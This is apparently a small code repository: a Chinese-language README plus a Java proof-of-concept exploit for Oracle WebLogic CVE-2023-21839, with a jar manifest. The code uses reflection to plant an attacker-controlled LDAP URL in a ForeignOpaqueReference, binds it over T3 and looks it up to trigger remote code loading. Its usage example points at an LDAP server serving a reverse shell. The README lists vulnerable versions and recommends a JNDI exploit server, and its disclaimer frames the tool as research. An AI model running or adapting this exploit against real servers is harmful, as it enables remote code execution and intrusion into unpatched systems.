├── README.md
└── Weblogic-CVE-2023-21839
    └── src
        ├── CVE_2023_21839.java
        └── META-INF
            └── MANIFEST.MF


/README.md:
--------------------------------------------------------------------------------
 1 | # Weblogic-CVE-2023-21839
 2 | 
 3 | CVE-2023-21839 根据网络公开poc造的轮子
 4 | 
 5 | 影响版本
 6 | 
 7 | 12.2.1.3.0
 8 | 
 9 | 12.2.1.4.0
10 | 
11 | 14.1.1.0.0
12 | 
13 | 
14 | 使用方法 
15 | > java -jar 目标ip:端口 ldap地址
16 | 
17 | 推荐工具：
18 | 
19 | https://github.com/WhiteHSBG/JNDIExploit
20 | 
21 | # 免责声明
22 | 此工具仅作为网络安全攻防研究交流，请使用者遵照网络安全法合理使用！
23 | 
24 | 如果使用者使用该工具出现任何非法攻击等违法行为，与作者无关！
25 | 


--------------------------------------------------------------------------------
/Weblogic-CVE-2023-21839/src/CVE_2023_21839.java:
--------------------------------------------------------------------------------
 1 | import javax.naming.Context;
 2 | import javax.naming.InitialContext;
 3 | import javax.naming.NamingException;
 4 | import java.lang.reflect.Field;
 5 | import java.util.Hashtable;
 6 | import java.util.Random;
 7 | 
 8 | public class CVE_2023_21839 {
 9 |     static String JNDI_FACTORY="weblogic.jndi.WLInitialContextFactory";
10 |     static String HOW_TO_USE="[*]java -jar 目标ip:端口 ldap地址\ne.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111";
11 | 
12 |     private static InitialContext getInitialContext(String url)throws NamingException
13 |     {
14 |         Hashtable<String,String> env = new Hashtable<String,String>();
15 |         env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
16 |         env.put(Context.PROVIDER_URL, url);
17 |         return new InitialContext(env);
18 |     }
19 |     public static void main(String args[]) throws Exception {
20 |         if(args.length <2){
21 |             System.out.println(HOW_TO_USE);
22 |             System.exit(0);
23 |         }
24 |         String t3Url = args[0];
25 |         String ldapUrl = args[1];
26 |         InitialContext c=getInitialContext("t3://"+t3Url);
27 |         Hashtable<String,String> env = new Hashtable<String,String>();
28 |         env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");
29 |         weblogic.deployment.jms.ForeignOpaqueReference f=new weblogic.deployment.jms.ForeignOpaqueReference();
30 |         Field jndiEnvironment=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
31 |         jndiEnvironment.setAccessible(true);
32 |         jndiEnvironment.set(f,env);
33 |         Field remoteJNDIName=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
34 |         remoteJNDIName.setAccessible(true);
35 |         remoteJNDIName.set(f,ldapUrl);
36 |         String bindName = new Random(System.currentTimeMillis()).nextLong()+"";
37 |         try{
38 |             c.bind(bindName,f);
39 |             c.lookup(bindName);
40 |         }catch(Exception e){ }
41 | 
42 |     }
43 | }


--------------------------------------------------------------------------------
/Weblogic-CVE-2023-21839/src/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Main-Class: CVE_2023_21839
3 | Class-Path: CVE_2023_21839
4 | 
5 | 


--------------------------------------------------------------------------------